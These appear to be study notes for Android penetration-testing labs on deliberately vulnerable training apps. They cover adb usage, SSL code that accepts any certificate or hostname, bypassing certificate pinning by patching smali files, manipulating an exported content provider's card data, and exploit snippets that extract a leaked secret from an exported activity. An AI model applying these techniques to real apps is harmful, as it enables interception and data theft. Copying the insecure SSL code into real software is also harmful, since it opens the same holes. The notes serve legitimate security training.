https://github.com/newbit1/rootAVD
HINT: You will need ProxyDroid installed on a physical device or an emulator (based on an ARM system image) using the –http-proxy command line option. To be able to inspect network traffic deriving from the Uber application, we recommend using a rooted device with ProxyDroid installed or launching an emulator (based on an ARM system image) using the –http-proxy command line option.
List Devices/Emulators
adb devices
Open shell on Device
adb shell
Installing APK file
adb install filename.apk
Switch off device
adb -s <emulator-number> emu kill
Call ACTION
adb.exe shell am start –a android.intent.action.MAIN –n com.example.android.notepad/.NotesList
- ACTION: android.intent.action.MAIN
- PACKAGE: com.example.android.notepad
- ACTIVITY: .NotesList
Send to Content Provider
adb.exe shell am start –a android.intent.action.EDIT –n com.example.android.notepad/.NoteEditor –d content://com.google.provider.NotePad/notes/1
- The –d option specifies the DATA_URI to send. Its structure:
- Scheme:
content:// - Authority:
com.google.provider.NotePad - Path:
/notes/ - ID:
1
ADB Shell Logs
adb.exe shell logcat
Pass Value using -e
adb shell am broadcast -a com.elearnsecurity.vulnerablereceiver.CHANGEPW -e PASSWORD 1234
HostNameVerifier is implemented inside the application as follows, and will turn off any kind of hostname verification when using SSL connections.
SSLSocketFactory sf = new CustomSSLSocketFactory(trustStore);
sf.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER);
Accepting Any Certificate
public void onReceivedSslError(WebView paramWebView, SslErrorHandler paramSslErrorHandler, SslError paramSslError)
{
AuthorizationRequest.OAuthDialog.this.setLiveSdkProvProgressStatus(false);
paramSslErrorHandler.proceed();
}
The custom SSL error handler above ignores any certificate validation error. Specifically, the handler will call proceed() and a connection will always be established regardless of any certificate error occurring. This leads to the application accepting any certificate.
through .smali files patching
https://github.com/moxie0/AndroidPinning
https://github.com/newbit1/rootAVD
https://github.com/ikust/hello-pinnedcerts
NOTE: If you intend to install the rebuilt APK in an emulator other than the one of Android Studio or in a physical device, do not forget to sign your application.
For more information on signing the rebuilt APK please refer to https://developer.android.com/studio/publish/app-signing.html.
HttpClientBuilder class is called to construct the DefaultHttpClient
From the arguments that DefaultHttpClient expects during creation, you can see that it takes a keyStore into consideration. Specifically, when creating an instance of DefaultHttpClient that keyStore can be used to pin the certificates that it contains, by adding a scheme. This will result in the constructed httpClient, only allowing requests to hosts that are signed with the certificates provided in keyStore file.
Certificate pinning is usually implemented by comparing the certificate the application comes across during connection, against a predefined and bundled list of trusted SSL certificates, within the application (in this case, the trusted SSL certificates are inside a BKS keystore).
In order to bypass the certificate pinning mechanism, you will have to find a way to “remove” the DefaultHttpClient parameter which is related to the keyStore. But this is not the only place where certificate pinning related code exists.
If you navigate to /res/raw/ directory of Apktool’s output, you will find the Bouncy Castle keystore that the application uses.
You will have to “remove” pinCertificates as its functionality is highly related with the keyStore that facilitates the certificate pinning mechanism’s implementation.
As you identified, all the source code components you have to “remove” in order to bypass the certificate pinning mechanism are located inside the HttpClientBuilder class. The easiest way to “remove” application components is by patching the class that contains them. You can patch a class by modifying/editing the related application’s .smali files.
Finally, all you have to do is rebuild the application using Apktool and sign it using the jarsigner tool.
After adb shell
content query --uri content://com.elearnsecurity.provider.Wallet/cards
If you only want to return a portion of the database, for example only one column, you can execute the following.
content query --uri content://com.elearnsecurity.provider.Wallet/cards -–projection name
If you want a specific row, you can specify it with the following command.
content query --uri content://com.elearnsecurity.provider.Wallet/cards --where "name='Bob'"
Insert a new name and credit card number by executing the following.
content insert -–uri content://com.elearnsecurity.provider.Wallet/cards --bind name:s:Frank --bind number:i:5555555555
Update and change
content update -–uri content://com.elearnsecurity.provider.Wallet/cards --bind number:i:999999999 --where "name='Bob'"
Note: You will not be able to execute any of the abovementioned database manipulations on a device running API level 24.
Content provider is explicitly exported. This means that it can be accessed and used by any application on the device.
It will be possible to create an exploit application that will launch Activity because this activity is explicitly exported.
https://developer.android.com/training/basics/intents/result.html
- By launching the LeakyActivity and parsing the device’s log files. This will require a device running an Android version earlier than 4.1 or a rooted device for devices running an Android version older than or equal to 4.1, in order to be successful
In addition, if the exploit application found a way to be signed with the same certificate as the one used to sign the target application then it could access the target application’s logs without root (superuser) privileges.
-
By launching the unprotected activity using startActivityForResult() and overriding onActivityResult() in order to extract the result LeakyActivity returns.
-
[EXPLOIT] Exploit application that launches LeakyActivity and parses the device’s logs Now to some Android programming basics. In order for an application to launch another application’s exported activity, (that it is not protected by any permissions) the following snippet is required:
https://github.com/pluxoid/matlog
Intent intent=new Intent(); intent.setComponent(new ComponentName("com.elearnsecurity.insecureactivities", "com.elearnsecurity.insecureactivities.LeakyActivity"));
startActivity(intent);
Please note that when it is time to create your exploit POC application choose Build Type: debug.
- [EXPLOIT] Exploit application that launches LeakyActivity using startActivityForResult() and overriding onActivityResult() to extract LeakyActivity’s result Now to some Android programming basics. In order for an application to launch another application’s unprotected exported activity (that returns a result) and extract its result, the following snippets are required. First you will have to launch LeakyActivity using startActivityForResult() as follows:
static final int PICK_REQUEST = 1; // The request code
Intent pickSecretIntent = new Intent(); pickSecretIntent.setComponent(new ComponentName("com.elearnsecurity.insecureactivities", "com.elearnsecurity.insecureactivities.LeakyActivity"));
startActivityForResult(pickSecretIntent, PICK_REQUEST);
Then you will have to override the onActivityResult() method in order to extract the result LeakyActivity returns, as follows:
@Override
public void onActivityResult(int requestCode, int resultCode, Intent data) {
if (requestCode == PICK_REQUEST) {
if (resultCode == 2) {
String secret = data.getStringExtra("SECRET"); Log.v("SECRET",secret);
}
}
}
The receiver is actually being implicitly exported, due to the presence of an intent-filter. In addition, as you can see, it is not protected by any permissions. Consequently any other application on the device can pass an Intent to it.